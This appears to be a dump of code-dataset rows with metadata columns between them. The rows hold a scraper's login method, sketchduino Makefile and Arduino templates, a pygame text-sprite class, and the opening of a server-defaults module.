analog_item["image"] = self.get_image(image_link, image_id=image_link.split("/")[-1].split(".")[0])
item.set_analog(analog_item)
return self.response_brand(0, "OK", item)
elif self.connected:
return self.response_brand(3, "Помилка авторизації")
else:
return self.response_brand(2, "Помилка з'єднання")
def sign_in(self):
main_page_request = self.session.get(self.Link.main)
if main_page_request.status_code != 200:
return 0, 0
login_request = self.session.post(self.Link.login, data={"login": self.username, "password": <PASSWORD>},
headers={"Content-Type": "application/x-www-form-urlencoded"})
if login_request.status_code == 200:
return 1, 1
else:
return 1, 0 | en | 0.644078 | # coding=utf-8 | 2.412715 | 2 |
sketchduino/template.py | rodrigopmatias/sketchduino | 0 | 10361 | # -*- coding: utf-8 -*-
'''
Copyright 2012 <NAME> <<EMAIL>>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
templates = {
'static_link': '''
\t@$(AR) rcs %(lib)s %(obj)s
\t@echo " [\033[33m\033[1mAR\033[0m] - \033[37m\033[1m%(obj)s\033[0m to \033[37m\033[1m%(lib)s\033[0m"''',
'c_obj_ruler': '''%(obj)s: %(source)s
\t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'asm_obj_ruler': '''%(obj)s: %(source)s
\t@$(AS) $(ASFLAGS) -o %(obj)s %(source)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mAS\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'c_asm_ruler': '''%(obj)s: %(source)s
\t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'cxx_obj_ruler': '''%(obj)s: %(source)s
\t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'cxx_asm_ruler': '''%(obj)s: %(source)s
\t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'avr-main.cc': '''/**
* Generated with sketch %(version)s
**/
#include <avr/sleep.h>
int main(void) {
for(;;)
sleep_mode();
return 0;
}''',
'main.cc': '''/**
* Generated with sketch %(version)s
**/
#include <Arduino.h>
/**
* Setup of the firmware
**/
void setup() {
}
/**
* Schedule events for firmware program
**/
void loop() {
delay(250);
}''',
'Makefile': '''##########################################
# Makefile generated with sketch %(version)s
##########################################
# Defines of Arduino
ARDUINO_HOME=%(sdk_home)s
ARDUINO_CORE=$(ARDUINO_HOME)/hardware/arduino/cores
ARDUINO_VARIANT=$(ARDUINO_HOME)/hardware/arduino/variants/%(variant)s
# Define toolchain
CC=%(cc)s
CXX=%(cxx)s
AS=%(asm)s
LD=%(ld)s
AR=%(ar)s
OBJCOPY=%(objcopy)s
SIZE=%(size)s
AVRDUDE=%(avrdude)s
PROGRAMER=%(programer)s
LIB=
INCLUDE=-I$(ARDUINO_CORE)/arduino -I$(ARDUINO_VARIANT) -I$(ARDUINO_CORE) -I lib/
#Define of MCU
MCU=%(mcu)s
CLOCK=%(clock_hz)sUL
ARDUINO=%(sdk_version)s
# Define compiler flags
_CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\
-DF_CPU=$(CLOCK) -MMD -DARDUINO=$(ARDUINO) \\
-fpermissive -lm -Wl,-u,vfprintf -lprintf_min
CFLAGS=$(_CFLAGS) -std=c99
CXXFLAGS=$(_CFLAGS) -std=c++98
ASFLAGS=-mmcu $(MCU)
# Define compiler rulers
OBJ=%(obj_dep)s
CORE_OBJ=%(core_obj_dep)s
AOUT=binary/%(project_name)s-%(mcu)s.elf
HEX=binary/%(project_name)s-%(mcu)s.hex
EPP=binary/%(project_name)s-%(mcu)s.epp
CORE_LIB=binary/core.a
LIB_DEPS=%(lib_deps)s
LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm
AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i
SIZE_OPTS=-C --mcu=$(MCU)
CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0)
ifeq ($(CONFIG_EXISTS), 1)
include Makefile.config
endif
all: $(HEX) $(EPP)
rebuild: clean all
deploy: $(HEX)
\t$(AVRDUDE) $(AVRDUDE_OPTIONS)
$(HEX): $(EPP)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m"
\t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX)
$(EPP): $(AOUT)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m"
\t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP)
size: $(AOUT)
\t@$(SIZE) $(SIZE_OPTS) $(AOUT)
$(AOUT): clear-compiler $(OBJ) $(CORE_LIB) $(LIB_DEPS)
\t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m"
\t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(CORE_LIB) $(LIB_DEPS) -o $(AOUT)
$(CORE_LIB): $(CORE_OBJ)%(core_ruler)s
%(asm_rulers)s
%(obj_rulers)s
%(libs_rulers)s
%(core_asm_rulers)s
%(core_obj_rulers)s
clear-compiler:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs"
\trm -f compile.*
clean-tmp:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
clean-bin:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
clean:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
''',
'avr-Makefile': '''##########################################
# Makefile generated with sketch %(version)s
##########################################
# Define toolchain
CC=%(cc)s
CXX=%(cxx)s
AS=%(asm)s
LD=%(ld)s
AR=%(ar)s
OBJCOPY=%(objcopy)s
SIZE=%(size)s
AVRDUDE=%(avrdude)s
PROGRAMER=%(programer)s
LIB=
INCLUDE=-I lib/
#Define of MCU
MCU=%(mcu)s
CLOCK=%(clock_hz)sUL
# Define compiler flags
_CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\
-DF_CPU=$(CLOCK) -fpermissive -lm -Wl,-u,vfprintf -lprintf_min
CFLAGS=$(_CFLAGS) -std=c99
CXXFLAGS=$(_CFLAGS) -std=c++98
ASFLAGS=-mmcu $(MCU)
# Define compiler rulers
ASM=%(asm_dep)s
OBJ=%(obj_dep)s
LIB_DEPS=%(lib_deps)s
AOUT=binary/%(project_name)s-%(mcu)s.elf
HEX=binary/%(project_name)s-%(mcu)s.hex
EPP=binary/%(project_name)s-%(mcu)s.epp
LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm
AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i
SIZE_OPTS=-A
CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0)
ifeq ($(CONFIG_EXISTS), 1)
include Makefile.config
endif
all: $(HEX) $(EPP)
rebuild: clean all
deploy: $(HEX)
\t$(AVRDUDE) $(AVRDUDE_OPTIONS)
$(HEX): $(EPP)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m"
\t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX)
$(EPP): $(AOUT)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m"
\t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP)
size: $(AOUT)
\t@$(SIZE) $(SIZE_OPTS) $(AOUT)
$(AOUT): clear-compiler $(OBJ) $(LIB_DEPS)
\t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m"
\t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(LIB_DEPS) -o $(AOUT)
%(asm_rulers)s
%(obj_rulers)s
%(libs_rulers)s
clear-compiler:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs"
\t@rm -f compile.*
clean-tmp:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
clean-bin:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
clean:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
'''
}
| # -*- coding: utf-8 -*-
'''
Copyright 2012 <NAME> <<EMAIL>>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
templates = {
'static_link': '''
\t@$(AR) rcs %(lib)s %(obj)s
\t@echo " [\033[33m\033[1mAR\033[0m] - \033[37m\033[1m%(obj)s\033[0m to \033[37m\033[1m%(lib)s\033[0m"''',
'c_obj_ruler': '''%(obj)s: %(source)s
\t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'asm_obj_ruler': '''%(obj)s: %(source)s
\t@$(AS) $(ASFLAGS) -o %(obj)s %(source)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mAS\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'c_asm_ruler': '''%(obj)s: %(source)s
\t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'cxx_obj_ruler': '''%(obj)s: %(source)s
\t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'cxx_asm_ruler': '''%(obj)s: %(source)s
\t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'avr-main.cc': '''/**
* Generated with sketch %(version)s
**/
#include <avr/sleep.h>
int main(void) {
for(;;)
sleep_mode();
return 0;
}''',
'main.cc': '''/**
* Generated with sketch %(version)s
**/
#include <Arduino.h>
/**
* Setup of the firmware
**/
void setup() {
}
/**
* Schedule events for firmware program
**/
void loop() {
delay(250);
}''',
'Makefile': '''##########################################
# Makefile generated with sketch %(version)s
##########################################
# Defines of Arduino
ARDUINO_HOME=%(sdk_home)s
ARDUINO_CORE=$(ARDUINO_HOME)/hardware/arduino/cores
ARDUINO_VARIANT=$(ARDUINO_HOME)/hardware/arduino/variants/%(variant)s
# Define toolchain
CC=%(cc)s
CXX=%(cxx)s
AS=%(asm)s
LD=%(ld)s
AR=%(ar)s
OBJCOPY=%(objcopy)s
SIZE=%(size)s
AVRDUDE=%(avrdude)s
PROGRAMER=%(programer)s
LIB=
INCLUDE=-I$(ARDUINO_CORE)/arduino -I$(ARDUINO_VARIANT) -I$(ARDUINO_CORE) -I lib/
#Define of MCU
MCU=%(mcu)s
CLOCK=%(clock_hz)sUL
ARDUINO=%(sdk_version)s
# Define compiler flags
_CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\
-DF_CPU=$(CLOCK) -MMD -DARDUINO=$(ARDUINO) \\
-fpermissive -lm -Wl,-u,vfprintf -lprintf_min
CFLAGS=$(_CFLAGS) -std=c99
CXXFLAGS=$(_CFLAGS) -std=c++98
ASFLAGS=-mmcu $(MCU)
# Define compiler rulers
OBJ=%(obj_dep)s
CORE_OBJ=%(core_obj_dep)s
AOUT=binary/%(project_name)s-%(mcu)s.elf
HEX=binary/%(project_name)s-%(mcu)s.hex
EPP=binary/%(project_name)s-%(mcu)s.epp
CORE_LIB=binary/core.a
LIB_DEPS=%(lib_deps)s
LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm
AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i
SIZE_OPTS=-C --mcu=$(MCU)
CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0)
ifeq ($(CONFIG_EXISTS), 1)
include Makefile.config
endif
all: $(HEX) $(EPP)
rebuild: clean all
deploy: $(HEX)
\t$(AVRDUDE) $(AVRDUDE_OPTIONS)
$(HEX): $(EPP)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m"
\t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX)
$(EPP): $(AOUT)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m"
\t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP)
size: $(AOUT)
\t@$(SIZE) $(SIZE_OPTS) $(AOUT)
$(AOUT): clear-compiler $(OBJ) $(CORE_LIB) $(LIB_DEPS)
\t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m"
\t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(CORE_LIB) $(LIB_DEPS) -o $(AOUT)
$(CORE_LIB): $(CORE_OBJ)%(core_ruler)s
%(asm_rulers)s
%(obj_rulers)s
%(libs_rulers)s
%(core_asm_rulers)s
%(core_obj_rulers)s
clear-compiler:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs"
\trm -f compile.*
clean-tmp:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
clean-bin:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
clean:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
''',
'avr-Makefile': '''##########################################
# Makefile generated with sketch %(version)s
##########################################
# Define toolchain
CC=%(cc)s
CXX=%(cxx)s
AS=%(asm)s
LD=%(ld)s
AR=%(ar)s
OBJCOPY=%(objcopy)s
SIZE=%(size)s
AVRDUDE=%(avrdude)s
PROGRAMER=%(programer)s
LIB=
INCLUDE=-I lib/
#Define of MCU
MCU=%(mcu)s
CLOCK=%(clock_hz)sUL
# Define compiler flags
_CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\
-DF_CPU=$(CLOCK) -fpermissive -lm -Wl,-u,vfprintf -lprintf_min
CFLAGS=$(_CFLAGS) -std=c99
CXXFLAGS=$(_CFLAGS) -std=c++98
ASFLAGS=-mmcu $(MCU)
# Define compiler rulers
ASM=%(asm_dep)s
OBJ=%(obj_dep)s
LIB_DEPS=%(lib_deps)s
AOUT=binary/%(project_name)s-%(mcu)s.elf
HEX=binary/%(project_name)s-%(mcu)s.hex
EPP=binary/%(project_name)s-%(mcu)s.epp
LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm
AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i
SIZE_OPTS=-A
CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0)
ifeq ($(CONFIG_EXISTS), 1)
include Makefile.config
endif
all: $(HEX) $(EPP)
rebuild: clean all
deploy: $(HEX)
\t$(AVRDUDE) $(AVRDUDE_OPTIONS)
$(HEX): $(EPP)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m"
\t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX)
$(EPP): $(AOUT)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m"
\t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP)
size: $(AOUT)
\t@$(SIZE) $(SIZE_OPTS) $(AOUT)
$(AOUT): clear-compiler $(OBJ) $(LIB_DEPS)
\t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m"
\t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(LIB_DEPS) -o $(AOUT)
%(asm_rulers)s
%(obj_rulers)s
%(libs_rulers)s
clear-compiler:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs"
\t@rm -f compile.*
clean-tmp:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
clean-bin:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
clean:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
'''
}
| en | 0.256779 | # -*- coding: utf-8 -*- Copyright 2012 <NAME> <<EMAIL>> Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. \t@$(AR) rcs %(lib)s %(obj)s \t@echo " [\033[33m\033[1mAR\033[0m] - \033[37m\033[1m%(obj)s\033[0m to \033[37m\033[1m%(lib)s\033[0m" %(obj)s: %(source)s \t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err \t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m" %(obj)s: %(source)s \t@$(AS) $(ASFLAGS) -o %(obj)s %(source)s 1>> compile.log 2>> compile.err \t@echo " [\033[33m\033[1mAS\033[0m] - \033[37m\033[1m%(source)s\033[0m" %(obj)s: %(source)s \t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err \t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m" %(obj)s: %(source)s \t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err \t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m" %(obj)s: %(source)s \t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err \t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m" /** * Generated with sketch %(version)s **/ #include <avr/sleep.h> int main(void) { for(;;) sleep_mode(); return 0; } /** * Generated with sketch %(version)s **/ #include <Arduino.h> /** * Setup of the firmware **/ void setup() { } /** * Schedule events for firmware program **/ void loop() { delay(250); } ########################################## # Makefile generated with sketch %(version)s ########################################## # Defines of Arduino ARDUINO_HOME=%(sdk_home)s ARDUINO_CORE=$(ARDUINO_HOME)/hardware/arduino/cores ARDUINO_VARIANT=$(ARDUINO_HOME)/hardware/arduino/variants/%(variant)s # Define toolchain CC=%(cc)s CXX=%(cxx)s AS=%(asm)s LD=%(ld)s AR=%(ar)s OBJCOPY=%(objcopy)s SIZE=%(size)s AVRDUDE=%(avrdude)s PROGRAMER=%(programer)s LIB= INCLUDE=-I$(ARDUINO_CORE)/arduino -I$(ARDUINO_VARIANT) -I$(ARDUINO_CORE) -I lib/ #Define of MCU MCU=%(mcu)s CLOCK=%(clock_hz)sUL ARDUINO=%(sdk_version)s # Define compiler flags _CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\ -DF_CPU=$(CLOCK) -MMD -DARDUINO=$(ARDUINO) \\ -fpermissive -lm -Wl,-u,vfprintf -lprintf_min CFLAGS=$(_CFLAGS) -std=c99 CXXFLAGS=$(_CFLAGS) -std=c++98 ASFLAGS=-mmcu $(MCU) # Define compiler rulers OBJ=%(obj_dep)s CORE_OBJ=%(core_obj_dep)s AOUT=binary/%(project_name)s-%(mcu)s.elf HEX=binary/%(project_name)s-%(mcu)s.hex EPP=binary/%(project_name)s-%(mcu)s.epp CORE_LIB=binary/core.a LIB_DEPS=%(lib_deps)s LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i SIZE_OPTS=-C --mcu=$(MCU) CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0) ifeq ($(CONFIG_EXISTS), 1) include Makefile.config endif all: $(HEX) $(EPP) rebuild: clean all deploy: $(HEX) \t$(AVRDUDE) $(AVRDUDE_OPTIONS) $(HEX): $(EPP) \t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m" \t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX) $(EPP): $(AOUT) \t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m" \t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP) size: $(AOUT) \t@$(SIZE) $(SIZE_OPTS) $(AOUT) $(AOUT): clear-compiler $(OBJ) $(CORE_LIB) $(LIB_DEPS) \t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m" \t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(CORE_LIB) $(LIB_DEPS) -o $(AOUT) $(CORE_LIB): $(CORE_OBJ)%(core_ruler)s %(asm_rulers)s %(obj_rulers)s %(libs_rulers)s %(core_asm_rulers)s %(core_obj_rulers)s clear-compiler: \t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs" \trm -f compile.* clean-tmp: \t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files" \t@rm -f tmp/* clean-bin: \t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files" \t@rm -f binary/* clean: \t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files" \t@rm -f tmp/* \t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files" \t@rm -f binary/* ########################################## # Makefile generated with sketch %(version)s ########################################## # Define toolchain CC=%(cc)s CXX=%(cxx)s AS=%(asm)s LD=%(ld)s AR=%(ar)s OBJCOPY=%(objcopy)s SIZE=%(size)s AVRDUDE=%(avrdude)s PROGRAMER=%(programer)s LIB= INCLUDE=-I lib/ #Define of MCU MCU=%(mcu)s CLOCK=%(clock_hz)sUL # Define compiler flags _CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\ -DF_CPU=$(CLOCK) -fpermissive -lm -Wl,-u,vfprintf -lprintf_min CFLAGS=$(_CFLAGS) -std=c99 CXXFLAGS=$(_CFLAGS) -std=c++98 ASFLAGS=-mmcu $(MCU) # Define compiler rulers ASM=%(asm_dep)s OBJ=%(obj_dep)s LIB_DEPS=%(lib_deps)s AOUT=binary/%(project_name)s-%(mcu)s.elf HEX=binary/%(project_name)s-%(mcu)s.hex EPP=binary/%(project_name)s-%(mcu)s.epp LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i SIZE_OPTS=-A CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0) ifeq ($(CONFIG_EXISTS), 1) include Makefile.config endif all: $(HEX) $(EPP) rebuild: clean all deploy: $(HEX) \t$(AVRDUDE) $(AVRDUDE_OPTIONS) $(HEX): $(EPP) \t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m" \t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX) $(EPP): $(AOUT) \t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m" \t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP) size: $(AOUT) \t@$(SIZE) $(SIZE_OPTS) $(AOUT) $(AOUT): clear-compiler $(OBJ) $(LIB_DEPS) \t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m" \t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(LIB_DEPS) -o $(AOUT) %(asm_rulers)s %(obj_rulers)s %(libs_rulers)s clear-compiler: \t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs" \t@rm -f compile.* clean-tmp: \t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files" \t@rm -f tmp/* clean-bin: \t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files" \t@rm -f binary/* clean: \t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files" \t@rm -f tmp/* \t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files" \t@rm -f binary/* | 1.551507 | 2 |
Tic-Tac-Pi/gameObjects/TextObject.py | mstubinis/Tic-Tac-Pi | 2 | 10362 | <filename>Tic-Tac-Pi/gameObjects/TextObject.py<gh_stars>1-10
import pygame
from pygame.locals import *
import resourceManager
class TextObject(pygame.sprite.Sprite):
def __init__(self,pos,fontSize,fontcolor,textstring):
pygame.sprite.Sprite.__init__(self) #call Sprite initializer
self.position = pos
self.message = textstring
self.color = fontcolor
self.font = pygame.font.Font(None,fontSize)
self.text = self.font.render(self.message, 1,fontcolor)
self.rect = pygame.Rect((0,0),self.font.size(self.message))
self.rect.midtop = pos
def is_clicked(self,events):
if self.is_mouse_over() == True:
for event in events:
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
return True
return False
def is_mouse_over(self):
mousePos = pygame.mouse.get_pos()
if mousePos[0] < self.rect.x:
return False
if mousePos[0] > self.rect.x + self.rect.w:
return False
if mousePos[1] < self.rect.y:
return False
if mousePos[1] > self.rect.y + self.rect.h:
return False
return True
def update_message(self,message):
self.message = message
self.text = self.font.render(message, 1,self.color)
self.rect.w = self.font.size(message)[0]
self.rect.h = self.font.size(message)[1]
self.rect.midtop = self.position
def update(self):
pass
def draw(self,screen):
screen.blit(self.text, self.rect)
| <filename>Tic-Tac-Pi/gameObjects/TextObject.py<gh_stars>1-10
import pygame
from pygame.locals import *
import resourceManager
class TextObject(pygame.sprite.Sprite):
def __init__(self,pos,fontSize,fontcolor,textstring):
pygame.sprite.Sprite.__init__(self) #call Sprite initializer
self.position = pos
self.message = textstring
self.color = fontcolor
self.font = pygame.font.Font(None,fontSize)
self.text = self.font.render(self.message, 1,fontcolor)
self.rect = pygame.Rect((0,0),self.font.size(self.message))
self.rect.midtop = pos
def is_clicked(self,events):
if self.is_mouse_over() == True:
for event in events:
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
return True
return False
def is_mouse_over(self):
mousePos = pygame.mouse.get_pos()
if mousePos[0] < self.rect.x:
return False
if mousePos[0] > self.rect.x + self.rect.w:
return False
if mousePos[1] < self.rect.y:
return False
if mousePos[1] > self.rect.y + self.rect.h:
return False
return True
def update_message(self,message):
self.message = message
self.text = self.font.render(message, 1,self.color)
self.rect.w = self.font.size(message)[0]
self.rect.h = self.font.size(message)[1]
self.rect.midtop = self.position
def update(self):
pass
def draw(self,screen):
screen.blit(self.text, self.rect)
| en | 0.250797 | #call Sprite initializer | 2.851465 | 3 |
src/encoded/server_defaults.py | beta-cell-network/beta-cell-nw | 4 | 10363 | from datetime import datetime
from jsonschema_serialize_fork import NO_DEFAULT
from pyramid.security import effective_principals
from pyramid.threadlocal import get_current_request
from string import (
digits,
ascii_uppercase,
)
import random
import uuid
from snovault.schema_utils import server_default
ACCESSION_FACTORY = __name__ + ':accession_factory'
def includeme(config):
